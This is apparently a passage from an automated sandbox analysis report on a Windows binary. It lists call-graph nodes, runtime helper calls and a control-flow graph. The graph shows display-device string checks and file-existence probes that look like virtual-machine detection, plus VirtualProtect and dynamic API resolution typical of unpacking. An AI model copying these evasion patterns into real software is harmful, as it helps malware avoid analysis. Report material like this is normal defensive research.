calls 11086->11087 11088 621dcc 11087->11088 11089 623020 task 25 API calls 11088->11089 11090 621ddb 11089->11090 11091 623020 task 25 API calls 11090->11091 11092 621e73 11091->11092 11093 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11092->11093 11094 621e88 11093->11094 11094->10906 11096 623040 27 API calls 11095->11096 11097 621ed2 11096->11097 11098 623040 27 API calls 11097->11098 11099 621eea 11098->11099 11100 623040 27 API calls 11099->11100 11101 621f03 11100->11101 11102 623040 27 API calls 11101->11102 11103 621f17 11102->11103 11104 623040 27 API calls 11103->11104 11105 621f34 operator!= 11104->11105 11106 623020 task 25 API calls 11105->11106 11107 621f55 11106->11107 11108 623020 task 25 API calls 11107->11108 11110 621f64 11108->11110 11109 623020 task 25 API calls 11111 621f94 11109->11111 11110->11109 11112 623020 task 25 API calls 11111->11112 11113 621fa0 11112->11113 11114 623020 task 25 API calls 11113->11114 11115 621fac 11114->11115 11116 623020 task 25 API calls 11115->11116 11117 621fb8 11116->11117 11118 623020 task 25 API calls 11117->11118 11119 621fc4 11118->11119 11120 623020 task 25 API calls 11119->11120 11121 621fd3 11120->11121 11122 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11121->11122 11123 621fe8 11122->11123 11123->10914 11125 623040 27 API calls 11124->11125 11126 622036 11125->11126 11127 623020 task 25 API calls 11126->11127 11128 62204f 11127->11128 11129 623020 task 25 API calls 11128->11129 11130 62205b 11129->11130 11131 623020 task 25 API calls 11130->11131 11132 62206a 11131->11132 11133 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11132->11133 11134 622082 11133->11134 11134->10920 11136 623040 27 API calls 11135->11136 11137 6220d3 11136->11137 11138 623020 task 25 API calls 11137->11138 11139 6220eb 11138->11139 11139->10924 11141 623040 27 API calls 11140->11141 11142 6221de 11141->11142 11143 623040 27 API calls 11142->11143 11144 6221f2 11143->11144 11145 623040 27 API calls 11144->11145 11146 622203 11145->11146 11147 623040 27 API calls 11146->11147 11148 622214 11147->11148 11149 623040 27 API calls 11148->11149 11150 62225a 11149->11150 11151 623040 27 API calls 11150->11151 11152 622280 operator!= 11151->11152 11153 623020 task 25 API calls 11152->11153 11154 6222aa 11153->11154 11155 623020 task 25 API calls 11154->11155 11156 6222b9 11155->11156 11157 623040 27 API calls 11156->11157 11158 62235e 11157->11158 11159 623040 27 API calls 11158->11159 11160 622384 operator!= 11159->11160 11161 623020 task 25 API calls 11160->11161 11162 6223ae 11161->11162 11163 623020 task 25 API calls 11162->11163 11166 6223bd 11163->11166 11164 623020 task 25 API calls 11165 622403 11164->11165 11167 623020 task 25 API calls 11165->11167 11166->11164 11168 62240f 11167->11168 11169 623020 task 25 API calls 11168->11169 11170 62241b 11169->11170 11171 623020 task 25 API calls 11170->11171 11172 62242a 11171->11172 11173 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11172->11173 11174 622445 LPtoDP 11173->11174 11174->10758 11174->10759 11186 623680 11175->11186 11179 623465 task 11185 6234ab task operator!= 11179->11185 11193 623610 11179->11193 11183 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11184 622b68 11183->11184 11184->10975 11185->11183 11187 62369b _Min_value task _Max_value 11186->11187 11188 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11187->11188 11189 62345b 11188->11189 11189->11179 11190 621bc0 11189->11190 11202 623a74 11190->11202 11194 623680 5 API calls 11193->11194 11195 62361f 11194->11195 11245 623790 11195->11245 11198 623730 11199 623740 allocator 11198->11199 11249 6238a0 11199->11249 11207 6239fc 11202->11207 11206 623a93 11213 6239ac 11207->11213 11210 624c96 11211 624cb0 11210->11211 11212 624cdd RaiseException 11210->11212 11211->11212 11212->11206 11216 624a5b 11213->11216 11217 6239d8 11216->11217 11218 624a68 11216->11218 11217->11210 11218->11217 11224 626b68 11218->11224 11221 624a95 11242 626940 11221->11242 11225 62857c 11224->11225 11226 6285ba 11225->11226 11228 6285a5 HeapAlloc 11225->11228 11232 62858e _free 11225->11232 11227 62881d _free 14 API calls 11226->11227 11230 624a85 11227->11230 11229 6285b8 11228->11229 11228->11232 11229->11230 11230->11221 11233 627e0a 11230->11233 11231 626b82 _Allocate EnterCriticalSection LeaveCriticalSection 11231->11232 11232->11226 11232->11228 11232->11231 11234 627e17 11233->11234 11235 627e25 11233->11235 11234->11235 11237 627e3c 11234->11237 11236 62881d _free 14 API calls 11235->11236 11241 627e2d 11236->11241 11239 627e37 11237->11239 11240 62881d _free 14 API calls 11237->11240 11238 626b07 ___std_exception_copy 25 API calls 11238->11239 11239->11221 11240->11241 11241->11238 11243 627fb2 _free 14 API calls 11242->11243 11244 626958 11243->11244 11244->11217 11246 6237b1 _Max_value 11245->11246 11247 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11246->11247 11248 62350c 11247->11248 11248->11198 11250 6238ba 11249->11250 11251 6238ac 11249->11251 11253 623749 11250->11253 11263 621b00 11250->11263 11255 623930 11251->11255 11253->11185 11256 623947 11255->11256 11257 62394c 11255->11257 11266 621a80 11256->11266 11259 621b00 _Allocate 16 API calls 11257->11259 11261 623955 11259->11261 11262 623970 11261->11262 11270 626b17 11261->11270 11262->11253 11316 623aa2 11263->11316 11267 621a8e stdext::threads::lock_error::lock_error 11266->11267 11268 624c96 Concurrency::cancel_current_task RaiseException 11267->11268 11269 621a9c 11268->11269 11269->11257 11275 626aa3 11270->11275 11272 626b26 11283 626b34 IsProcessorFeaturePresent 11272->11283 11274 626b33 11287 628481 GetLastError 11275->11287 11277 626aae 11278 626b34 _Allocate 11 API calls 11277->11278 11279 626abc 11277->11279 11280 626b06 11278->11280 11279->11272 11281 626aa3 ___std_exception_copy 25 API calls 11280->11281 11282 626b13 11281->11282 11282->11272 11284 626b40 11283->11284 11310 62695b 11284->11310 11288 62849e 11287->11288 11289 628498 11287->11289 11290 62a65c _free 6 API calls 11288->11290 11293 6284a4 SetLastError 11288->11293 11291 62a61d _free 6 API calls 11289->11291 11292 6284bc 11290->11292 11291->11288 11292->11293 11294 628830 _free 12 API calls 11292->11294 11293->11277 11295 6284cc 11294->11295 11297 6284d4 11295->11297 11298 6284eb 11295->11298 11299 62a65c _free 6 API calls 11297->11299 11300 62a65c _free 6 API calls 11298->11300 11301 6284e2 11299->11301 11302 6284f7 11300->11302 11306 627fb2 _free 12 API calls 11301->11306 11303 6284fb 11302->11303 11304 62850c 11302->11304 11307 62a65c _free 6 API calls 11303->11307 11305 628158 _free 12 API calls 11304->11305 11308 628517 11305->11308 11306->11293 11307->11301 11309 627fb2 _free 12 API calls 11308->11309 11309->11293 11311 626977 _unexpected 11310->11311 11312 6269a3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11311->11312 11313 626a74 _unexpected 11312->11313 11314 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11313->11314 11315 626a92 GetCurrentProcess TerminateProcess 11314->11315 11315->11274 11319 623aa7 11316->11319 11317 626b68 ___std_exception_copy 15 API calls 11317->11319 11318 621b0c 11318->11253 11319->11317 11319->11318 11322 623ac3 _Allocate 11319->11322 11326 626b82 11319->11326 11321 623e8c stdext::threads::lock_error::lock_error 11323 624c96 Concurrency::cancel_current_task RaiseException 11321->11323 11322->11321 11324 624c96 Concurrency::cancel_current_task RaiseException 11322->11324 11325 623ea9 11323->11325 11324->11321 11329 626baf 11326->11329 11330 626bbb __FrameHandler3::FrameUnwindToState 11329->11330 11331 62860b _unexpected EnterCriticalSection 11330->11331 11332 626bc6 11331->11332 11333 626c02 _Allocate LeaveCriticalSection 11332->11333 11334 626b8d 11333->11334 11334->11319 11337 623196 task 11335->11337 11336 6231da task 11336->11028 11337->11336 11339 623360 11337->11339 11342 6235b0 11339->11342 11341 623374 11341->11336 11343 6235db 11342->11343 11345 6235e8 _MallocaArrayHolder 11342->11345 11346 621b20 11343->11346 11345->11341 11347 621b5e 11346->11347 11348 626b17 _Allocate 25 API calls 11347->11348 11349 621b79 11347->11349 11348->11347 11349->11345 11351 621132 11350->11351 11352 62115a GetModuleHandleW 11351->11352 11353 62117f 11352->11353 11354 626b68 ___std_exception_copy 15 API calls 11353->11354 11355 6211ad __InternalCxxFrameHandler 11353->11355 11354->11355 11355->10942 11363 621359 __InternalCxxFrameHandler 11356->11363 11367 621352 11356->11367 11357 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11358 6216b0 GetPEB GetUserDefaultLCID 11357->11358 11358->10953 11359 6214ef 11360 621508 VirtualProtect 11359->11360 11364 62152a 11360->11364 11361 62142f GetModuleHandleA GetProcAddress LoadLibraryA 11361->11363 11362 621573 VirtualFree 11362->11364 11363->11359 11363->11361 11365 621490 11363->11365 11364->11362 11364->11367 11368 621593 VirtualProtect 11364->11368 11365->11363 11366 6214d5 GetProcAddress 11365->11366 11366->11365 11367->11357 11368->11367 11370->10970 11372 628341 11371->11372 11373 628347 11371->11373 11409 62a61d 11372->11409 11395 62834d SetLastError 11373->11395 11414 62a65c 11373->11414 11380 628394 11386 62a65c _free 6 API calls 11380->11386 11381 62837d 11384 62a65c _free 6 API calls 11381->11384 11382 6283e1 11385 627dc6 __FrameHandler3::FrameUnwindToState 64 API calls 11382->11385 11383 627d9b 11398 627dc6 11383->11398 11387 62838b 11384->11387 11388 6283e6 11385->11388 11389 6283a0 11386->11389 11426 627fb2 11387->11426 11390 6283a4 11389->11390 11391 6283b5 11389->11391 11393 62a65c _free 6 API calls 11390->11393 11432 628158 11391->11432 11393->11387 11395->11382 11395->11383 11397 627fb2 _free 14 API calls 11397->11395 11595 62a9c7 11398->11595 11401 627dd6 11403 627de0 IsProcessorFeaturePresent 11401->11403 11408 627dff 11401->11408 11405 627dec 11403->11405 11404 6276a7 _unexpected 23 API calls 11406 627e09 11404->11406 11407 62695b _unexpected 8 API calls 11405->11407 11407->11408 11408->11404 11437 62a4dc 11409->11437 11411 62a639 11412 62a642 11411->11412 11413 62a654 TlsGetValue 11411->11413 11412->11373 11415 62a4dc _free 5 API calls 11414->11415 11416 62a678 11415->11416 11417 628365 11416->11417 11418 62a696 TlsSetValue 11416->11418 11417->11395 11419 628830 11417->11419 11424 62883d _free 11419->11424 11420 62887d 11450 62881d 11420->11450 11421 628868 HeapAlloc 11422 628375 11421->11422 11421->11424 11422->11380 11422->11381 11424->11420 11424->11421 11425 626b82 _Allocate 2 API calls 11424->11425 11425->11424 11427 627fe6 _free 11426->11427 11428 627fbd HeapFree 11426->11428 11427->11395 11428->11427 11429 627fd2 11428->11429 11430 62881d _free 12 API calls 11429->11430 11431 627fd8 GetLastError 11430->11431 11431->11427 11453 627fec 11432->11453 11438 62a50a 11437->11438 11442 62a506 _free 11437->11442 11438->11442 11443 62a415 11438->11443 11441 62a524 GetProcAddress 11441->11442 11442->11411 11448 62a426 11443->11448 11444 62a4d1 11444->11441 11444->11442 11445 62a444 LoadLibraryExW 11446 62a45f GetLastError 11445->11446 11445->11448 11446->11448 11447 62a4ba FreeLibrary 11447->11448 11448->11444 11448->11445 11448->11447 11449 62a492 LoadLibraryExW 11448->11449 11449->11448 11451 628481 _free 14 API calls 11450->11451 11452 628822 11451->11452 11452->11422 11454 627ff8 __FrameHandler3::FrameUnwindToState 11453->11454 11467 62860b EnterCriticalSection 11454->11467 11456 628002 11468 628032 11456->11468 11459 6280fe 11460 62810a __FrameHandler3::FrameUnwindToState 11459->11460 11472 62860b EnterCriticalSection 11460->11472 11462 628114 11473 6282df 11462->11473 11464 62812c 11477 62814c 11464->11477 11467->11456 11471 628653 LeaveCriticalSection 11468->11471 11470 628020 11470->11459 11471->11470 11472->11462 11474 628315 _free 11473->11474 11475 6282ee _free 11473->11475 11474->11464 11475->11474 11480 62a0c4 11475->11480 11594 628653 LeaveCriticalSection 11477->11594 11479 62813a 11479->11397 11481 62a144 11480->11481 11484 62a0da 11480->11484 11482 62a192 11481->11482 11485 627fb2 _free 14 API calls 11481->11485 11548 62a235 11482->11548 11484->11481 11486 62a10d 11484->11486 11491 627fb2 _free 14 API calls 11484->11491 11487 62a166 11485->11487 11488 62a12f 11486->11488 11496 627fb2 _free 14 API calls 11486->11496 11489 627fb2 _free 14 API calls 11487->11489 11490 627fb2 _free 14 API calls 11488->11490 11492 62a179 11489->11492 11493 62a139 11490->11493 11495 62a102 11491->11495 11497 627fb2 _free 14 API calls 11492->11497 11498 627fb2 _free 14 API calls 11493->11498 11494 62a200 11499 627fb2 _free 14 API calls 11494->11499 11508 629c2f 11495->11508 11501 62a124 11496->11501 11502 62a187 11497->11502 11498->11481 11506 62a206 11499->11506 11536 629d2d 11501->11536 11504 627fb2 _free 14 API calls 11502->11504 11504->11482 11505 627fb2 14 API calls _free 11507 62a1a0 11505->11507 11506->11474 11507->11494 11507->11505 11509 629c40 11508->11509 11535 629d29 11508->11535 11510 629c51 11509->11510 11511 627fb2 _free 14 API calls 11509->11511 11512 629c63 11510->11512 11514 627fb2 _free 14 API calls 11510->11514 11511->11510 11513 629c75 11512->11513 11515 627fb2 _free 14 API calls 11512->11515 11516 629c87 11513->11516 11517 627fb2 _free 14 API calls 11513->11517 11514->11512 11515->11513 11518 629c99 11516->11518 11519 627fb2 _free 14 API calls 11516->11519 11517->11516 11520 629cab 11518->11520 11522 627fb2 _free 14 API calls 11518->11522 11519->11518 11521 629cbd 11520->11521 11523 627fb2 _free 14 API calls 11520->11523 11524 629ccf 11521->11524 11525 627fb2 _free 14 API calls 11521->11525 11522->11520 11523->11521 11526 629ce1 11524->11526 11527 627fb2 _free 14 API calls 11524->11527 11525->11524 11528 627fb2 _free 14 API calls 11526->11528 11532 629cf3 11526->11532 11527->11526 11528->11532 11529 627fb2 _free 14 API calls 11530 629d05 11529->11530 11531 629d17 11530->11531 11533 627fb2 _free 14 API calls 11530->11533 11534 627fb2 _free 14 API calls 11531->11534 11531->11535 11532->11529 11532->11530 11533->11531 11534->11535 11535->11486 11537 629d3a 11536->11537 11547 629d92 11536->11547 11538 627fb2 _free 14 API calls 11537->11538 11540 629d4a 11537->11540 11538->11540 11539 629d6e 11543 629d80 11539->11543 11545 627fb2 _free 14 API calls 11539->11545 11541 627fb2 _free 14 API calls 11540->11541 11544 629d5c 11540->11544 11541->11544 11542 627fb2 _free 14 API calls 11542->11539 11546 627fb2 _free 14 API calls 11543->11546 11543->11547 11544->11539 11544->11542 11545->11543 11546->11547 11547->11488 11549 62a242 11548->11549 11553 62a261 11548->11553 11549->11553 11554 629dce 11549->11554 11552 627fb2 _free 14 API calls 11552->11553 11553->11507 11555 629eac 11554->11555 11556 629ddf 11554->11556 11555->11552 11590 629d96 11556->11590 11559 629d96 _free 14 API calls 11560 629df2 11559->11560 11561 629d96 _free 14 API calls 11560->11561 11562 629dfd 11561->11562 11563 629d96 _free 14 API calls 11562->11563 11564 629e08 11563->11564 11565 629d96 _free 14 API calls 11564->11565 11566 629e16 11565->11566 11567 627fb2 _free 14 API calls 11566->11567 11568 629e21 11567->11568 11569 627fb2 _free 14 API calls 11568->11569 11570 629e2c 11569->11570 11571 627fb2 _free 14 API calls 11570->11571 11572 629e37 11571->11572 11573 629d96 _free 14 API calls 11572->11573 11574 629e45 11573->11574 11575 629d96 _free 14 API calls 11574->11575 11576 629e53 11575->11576 11577 629d96 _free 14 API calls 11576->11577 11578 629e64 11577->11578 11579 629d96 _free 14 API calls 11578->11579 11580 629e72 11579->11580 11581 629d96 _free 14 API calls 11580->11581 11582 629e80 11581->11582 11583 627fb2 _free 14 API calls 11582->11583 11584 629e8b 11583->11584 11585 627fb2 _free 14 API calls 11584->11585 11586 629e96 11585->11586 11587 627fb2 _free 14 API calls 11586->11587 11588 629ea1 11587->11588 11589 627fb2 _free 14 API calls 11588->11589 11589->11555 11591 629dc9 11590->11591 11592 629db9 11590->11592 11591->11559 11592->11591 11593 627fb2 _free 14 API calls 11592->11593 11593->11592 11594->11479 11631 62a8f9 11595->11631 11598 62aa0c 11599 62aa18 __FrameHandler3::FrameUnwindToState 11598->11599 11600 628481 _free 14 API calls 11599->11600 11605 62aa45 _unexpected 11599->11605 11606 62aa3f _unexpected 11599->11606 11600->11606 11601 62aa8c 11603 62881d _free 14 API calls 11601->11603 11602 62aa76 11602->11401 11604 62aa91 11603->11604 11642 626b07 11604->11642 11608 62aab8 11605->11608 11645 62860b EnterCriticalSection 11605->11645 11606->11601 11606->11602 11606->11605 11611 62aafa 11608->11611 11612 62abeb 11608->11612 11623 62ab29 11608->11623 11618 62832a _unexpected 66 API calls 11611->11618 11611->11623 11614 62abf6 11612->11614 11650 628653 LeaveCriticalSection 11612->11650 11616 6276a7 _unexpected 23 API calls 11614->11616 11622 62abfe __FrameHandler3::FrameUnwindToState 11616->11622 11617 62ab7e 11617->11602 11625 62832a _unexpected 66 API calls 11617->11625 11620 62ab1e 11618->11620 11619 62832a _unexpected 66 API calls 11619->11617 11621 62832a _unexpected 66 API calls 11620->11621 11621->11623 11651 62afa6 EnterCriticalSection 11622->11651 11646 62ab98 11623->11646 11625->11602 11626 62ac4e 11662 62ac7f 11626->11662 11628 62ac15 _unexpected 11628->11626 11652 62ae41 11628->11652 11632 62a905 __FrameHandler3::FrameUnwindToState 11631->11632 11637 62860b EnterCriticalSection 11632->11637 11634 62a913 11638 62a951 11634->11638 11637->11634 11641 628653 LeaveCriticalSection 11638->11641 11640 627dcb 11640->11401 11640->11598 11641->11640 11643 626aa3 ___std_exception_copy 25 API calls 11642->11643 11644 626b13 11643->11644 11644->11602 11645->11608 11647 62ab6f 11646->11647 11648 62ab9e 11646->11648 11647->11602 11647->11617 11647->11619 11665 628653 LeaveCriticalSection 11648->11665 11650->11614 11651->11628 11653 62ae57 11652->11653 11654 62ae4e 11652->11654 11669 62addc 11653->11669 11666 62ad37 11654->11666 11659 62ae73 11682 62bf7b 11659->11682 11661 62ae54 11661->11626 11919 62afba LeaveCriticalSection 11662->11919 11664 62ac6d 11664->11401 11665->11647 11693 62ac8b 11666->11693 11670 62adf4 11669->11670 11674 62ae19 11669->11674 11671 62b5ca _unexpected 25 API calls 11670->11671 11670->11674 11672 62ae12 11671->11672 11715 62c773 11672->11715 11674->11661 11675 62b5ca 11674->11675 11676 62b5d6 11675->11676 11677 62b5eb 11675->11677 11678 62881d _free 14 API calls 11676->11678 11677->11659 11679 62b5db 11678->11679 11680 626b07 ___std_exception_copy 25 API calls 11679->11680 11681 62b5e6 11680->11681 11681->11659 11683 62bf8c 11682->11683 11686 62bf99 11682->11686 11684 62881d _free 14 API calls 11683->11684 11692 62bf91 11684->11692 11685 62bfe2 11687 62881d _free 14 API calls 11685->11687 11686->11685 11688 62bfc0 11686->11688 11689 62bfe7 11687->11689 11900 62bed9 11688->11900 11691 626b07 ___std_exception_copy 25 API calls 11689->11691 11691->11692 11692->11661 11694 62ac97 __FrameHandler3::FrameUnwindToState 11693->11694 11701 62860b EnterCriticalSection 11694->11701 11696 62ad0d 11710 62ad2b 11696->11710 11697 62aca1 _unexpected 11697->11696 11702 62abff 11697->11702 11701->11697 11703 62ac0b __FrameHandler3::FrameUnwindToState 11702->11703 11713 62afa6 EnterCriticalSection 11703->11713 11705 62ac15 _unexpected 11708 62ae41 _unexpected 66 API calls 11705->11708 11709 62ac4e 11705->11709 11706 62ac7f _unexpected LeaveCriticalSection 11707 62ac6d 11706->11707 11707->11697 11708->11709 11709->11706 11714 628653 LeaveCriticalSection 11710->11714 11712 62ad19 11712->11661 11713->11705 11714->11712 11716 62c77f __FrameHandler3::FrameUnwindToState 11715->11716 11717 62c787 11716->11717 11721 62c79f 11716->11721 11740 62880a 11717->11740 11719 62c83a 11722 62880a __dosmaperr 14 API calls 11719->11722 11721->11719 11724 62c7d1 11721->11724 11725 62c83f 11722->11725 11723 62881d _free 14 API calls 11739 62c794 11723->11739 11743 6298e2 EnterCriticalSection 11724->11743 11727 62881d _free 14 API calls 11725->11727 11729 62c847 11727->11729 11728 62c7d7 11730 62c7f3 11728->11730 11731 62c808 11728->11731 11732 626b07 ___std_exception_copy 25 API calls 11729->11732 11734 62881d _free 14 API calls 11730->11734 11744 62c865 11731->11744 11732->11739 11736 62c7f8 11734->11736 11735 62c803 11786 62c832 11735->11786 11737 62880a __dosmaperr 14 API calls 11736->11737 11737->11735 11739->11674 11741 628481 _free 14 API calls 11740->11741 11742 62880f 11741->11742 11742->11723 11743->11728 11745 62c887 11744->11745 11781 62c8a3 11744->11781 11746 62c88b 11745->11746 11748 62c8db 11745->11748 11747 62880a __dosmaperr 14 API calls 11746->11747 11749 62c890 11747->11749 11750 62c8f1 11748->11750 11789 62cefc 11748->11789 11751 62881d _free 14 API calls 11749->11751 11792 62c40c 11750->11792 11754 62c898 11751->11754 11755 626b07 ___std_exception_copy 25 API calls 11754->11755 11755->11781 11757 62c938 11759 62c992 WriteFile 11757->11759 11760 62c94c 11757->11760 11758 62c8ff 11761 62c903 11758->11761 11762 62c925 11758->11762 11763 62c9b5 GetLastError 11759->11763 11770 62c91b 11759->11770 11765 62c982 11760->11765 11766 62c954 11760->11766 11767 62c9ff 11761->11767 11799 62c3a4 11761->11799 11804 62bff8 GetConsoleOutputCP 11762->11804 11763->11770 11832 62c47d 11765->11832 11771 62c972 11766->11771 11772 62c959 11766->11772 11773 62881d _free 14 API calls 11767->11773 11767->11781 11770->11767 11776 62c9d5 11770->11776 11770->11781 11824 62c641 11771->11824 11772->11767 11817 62c558 11772->11817 11775 62ca20 11773->11775 11778 62880a __dosmaperr 14 API calls 11775->11778 11779 62c9f3 11776->11779 11780 62c9dc 11776->11780 11778->11781 11839 6287e7 11779->11839 11782 62881d _free 14 API calls 11780->11782 11781->11735 11784 62c9e1 11782->11784 11785 62880a __dosmaperr 14 API calls 11784->11785 11785->11781 11899 629905 LeaveCriticalSection 11786->11899 11788 62c838 11788->11739 11844 62ce80 11789->11844 11866 62cb2a 11792->11866 11794 62c41d 11795 62c473 11794->11795 11796 62832a _unexpected 65 API calls 11794->11796 11795->11757 11795->11758 11797 62c440 11796->11797 11797->11795 11798 62c45a GetConsoleMode 11797->11798 11798->11795 11802 62c3fb 11799->11802 11803 62c3c6 11799->11803 11800 62cf17 5 API calls _unexpected 11800->11803 11801 62c3fd GetLastError 11801->11802 11802->11770 11803->11800 11803->11801 11803->11802 11875 627e6f 11804->11875 11806 62c2fa 11808 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11806->11808 11809 62c3a2 11808->11809 11809->11770 11811 62b556 62 API calls __fassign 11813 62c054 __InternalCxxFrameHandler 11811->11813 11812 62c27d WriteFile 11812->11813 11814 62c372 GetLastError 11812->11814 11813->11806 11813->11811 11813->11812 11813->11813 11815 62cd4a 19 API calls _unexpected 11813->11815 11816 62c2b5 WriteFile 11813->11816 11883 629eb2 11813->11883 11888 629625 11813->11888 11814->11806 11815->11813 11816->11813 11816->11814 11819 62c567 _unexpected 11817->11819 11818 62c626 11820 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11818->11820 11819->11818 11821 62c5dc WriteFile 11819->11821 11822 62c63f 11820->11822 11821->11819 11823 62c628 GetLastError 11821->11823 11822->11770 11823->11818 11830 62c650 _unexpected 11824->11830 11825 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11826 62c771 11825->11826 11826->11770 11827 629625 _unexpected WideCharToMultiByte 11827->11830 11828 62c75a GetLastError 11831 62c758 11828->11831 11829 62c70f WriteFile 11829->11828 11829->11830 11830->11827 11830->11828 11830->11829 11830->11831 11831->11825 11835 62c48c _unexpected 11832->11835 11833 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11834 62c556 11833->11834 11834->11770 11836 62c4fc WriteFile 11835->11836 11838 62c53d 11835->11838 11836->11835 11837 62c53f GetLastError 11836->11837 11837->11838 11838->11833 11840 62880a __dosmaperr 14 API calls 11839->11840 11841 6287f2 _free 11840->11841 11842 62881d _free 14 API calls 11841->11842 11843 628805 11842->11843 11843->11781 11853 6299b9 11844->11853 11846 62ce92 11847 62ce9a 11846->11847 11848 62ceab SetFilePointerEx 11846->11848 11849 62881d _free 14 API calls 11847->11849 11850 62ce9f 11848->11850 11851 62cec3 GetLastError 11848->11851 11849->11850 11850->11750 11852 6287e7 __dosmaperr 14 API calls 11851->11852 11852->11850 11854 6299c6 11853->11854 11855 6299db 11853->11855 11856 62880a __dosmaperr 14 API calls 11854->11856 11857 62880a __dosmaperr 14 API calls 11855->11857 11861 629a00 11855->11861 11858 6299cb 11856->11858 11859 629a0b 11857->11859 11860 62881d _free 14 API calls 11858->11860 11862 62881d _free 14 API calls 11859->11862 11863 6299d3 11860->11863 11861->11846 11864 629a13 11862->11864 11863->11846 11865 626b07 ___std_exception_copy 25 API calls 11864->11865 11865->11863 11867 62cb37 11866->11867 11869 62cb44 11866->11869 11868 62881d _free 14 API calls 11867->11868 11870 62cb3c 11868->11870 11871 62cb50 11869->11871 11872 62881d _free 14 API calls 11869->11872 11870->11794 11871->11794 11873 62cb71 11872->11873 11874 626b07 ___std_exception_copy 25 API calls 11873->11874 11874->11870 11876 627e8f 11875->11876 11882 627e86 11875->11882 11877 62832a _unexpected 66 API calls 11876->11877 11876->11882 11878 627eaf 11877->11878 11891 62b570 11878->11891 11882->11813 11884 62832a _unexpected 66 API calls 11883->11884 11885 629ebd 11884->11885 11886 62b570 __fassign 66 API calls 11885->11886 11887 629ecd 11886->11887 11887->11813 11890 62963c WideCharToMultiByte 11888->11890 11890->11813 11892 62b583 11891->11892 11893 627ec5 11891->11893 11892->11893 11894 62a310 __fassign 66 API calls 11892->11894 11895 62b59d 11893->11895 11894->11893 11896 62b5b0 11895->11896 11897 62b5c5 11895->11897 11896->11897 11898 629309 __fassign 66 API calls 11896->11898 11897->11882 11898->11897 11899->11788 11901 62bee5 __FrameHandler3::FrameUnwindToState 11900->11901 11914 6298e2 EnterCriticalSection 11901->11914 11903 62bef4 11904 62bf3b 11903->11904 11905 6299b9 _unexpected 25 API calls 11903->11905 11906 62881d _free 14 API calls 11904->11906 11907 62bf20 FlushFileBuffers 11905->11907 11908 62bf40 11906->11908 11907->11908 11909 62bf2c 11907->11909 11915 62bf6f 11908->11915 11910 62880a __dosmaperr 14 API calls 11909->11910 11912 62bf31 GetLastError 11910->11912 11912->11904 11914->11903 11918 629905 LeaveCriticalSection 11915->11918 11917 62bf58 11917->11692 11918->11917 11919->11664 11921 62755d 11920->11921 11922 62754c 11920->11922 11938 627404 11921->11938 11931 6275e4 GetModuleHandleW 11922->11931 11927 627597 11927->10738 11932 627551 11931->11932 11932->11921 11933 627627 GetModuleHandleExW 11932->11933 11934 627646 GetProcAddress 11933->11934 11935 62765b 11933->11935 11934->11935 11936 627678 11935->11936 11937 62766f FreeLibrary 11935->11937 11936->11921 11937->11936 11939 627410 __FrameHandler3::FrameUnwindToState 11938->11939 11954 62860b EnterCriticalSection 11939->11954 11941 62741a 11955 627451 11941->11955 11943 627427 11959 627445 11943->11959 11946 6275a2 11983 629763 GetPEB 11946->11983 11949 6275d1 11951 627627 _unexpected 3 API calls 11949->11951 11950 6275b1 GetPEB 11950->11949 11952 6275c1 GetCurrentProcess TerminateProcess 11950->11952 11953 6275d9 ExitProcess 11951->11953 11952->11949 11954->11941 11956 62745d __FrameHandler3::FrameUnwindToState 11955->11956 11957 6274be _unexpected 11956->11957 11962 627b65 11956->11962 11957->11943 11982 628653 LeaveCriticalSection 11959->11982 11961 627433 11961->11927 11961->11946 11965 627896 11962->11965 11966 6278a2 __FrameHandler3::FrameUnwindToState 11965->11966 11973 62860b EnterCriticalSection 11966->11973 11968 6278b0 11974 627a75 11968->11974 11973->11968 11975 6278bd 11974->11975 11976 627a94 11974->11976 11978 6278e5 11975->11978 11976->11975 11977 627fb2 _free 14 API calls 11976->11977 11977->11975 11981 628653 LeaveCriticalSection 11978->11981 11980 6278ce 11980->11957 11981->11980 11982->11961 11984 6275ac 11983->11984 11985 62977d 11983->11985 11984->11949 11984->11950 11987 62a55f 11985->11987 11988 62a4dc _free 5 API calls 11987->11988 11989 62a57b 11988->11989 11989->11984 11991 627d06 11990->11991 11992 627d18 ___scrt_uninitialize_crt 11990->11992 11993 627d14 11991->11993 11995 62ae89 11991->11995 11992->10784 11993->10784 11996 62ad37 ___scrt_uninitialize_crt 66 API calls 11995->11996 11997 62ae90 11996->11997 11997->11993

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 e48660-e48670 call e49120 3 e48672-e48680 0->3 3->3 4 e48682-e486a8 EnumDisplayDevicesW 3->4 5 e4871a-e4874e GetModuleHandleA GetProcAddress * 2 4->5 6 e486aa 4->6 8 e48756-e48794 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->8 9 e48750-e48753 5->9 7 e486b0-e486c1 StrStrIW 6->7 12 e487b5-e487bd 7->12 13 e486c7-e486d7 StrStrIW 7->13 10 e48796-e48798 8->10 11 e487be-e487c0 8->11 9->8 10->11 14 e4879a-e487a6 GetFileAttributesW 10->14 15 e487c7-e48814 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 11->15 16 e487c2 11->16 13->12 17 e486dd-e486ed StrStrIW 13->17 14->11 18 e487a8-e487aa 14->18 20 e48816-e48818 15->20 21 e4881a-e48842 15->21 16->15 17->12 19 e486f3-e48703 StrStrIW 17->19 18->11 22 e487ac-e487ae 18->22 19->12 23 e48709-e48718 EnumDisplayDevicesW 19->23 20->12 20->21 24 e48845-e4886b PathCombineW GetFileAttributesW 21->24 22->12 27 e487b0 22->27 23->5 23->7 25 e48875 24->25 26 e4886d-e4886f 24->26 29 e48877-e48887 25->29 26->25 28 e48871-e48873 26->28 27->12 28->29 29->24 30 e48889-e48892 29->30 30->12 31 e48898-e488da PathCombineW * 2 GetFileAttributesW 30->31 32 e488e0-e488e2 31->32 33 e48a5e-e48a83 PathCombineW 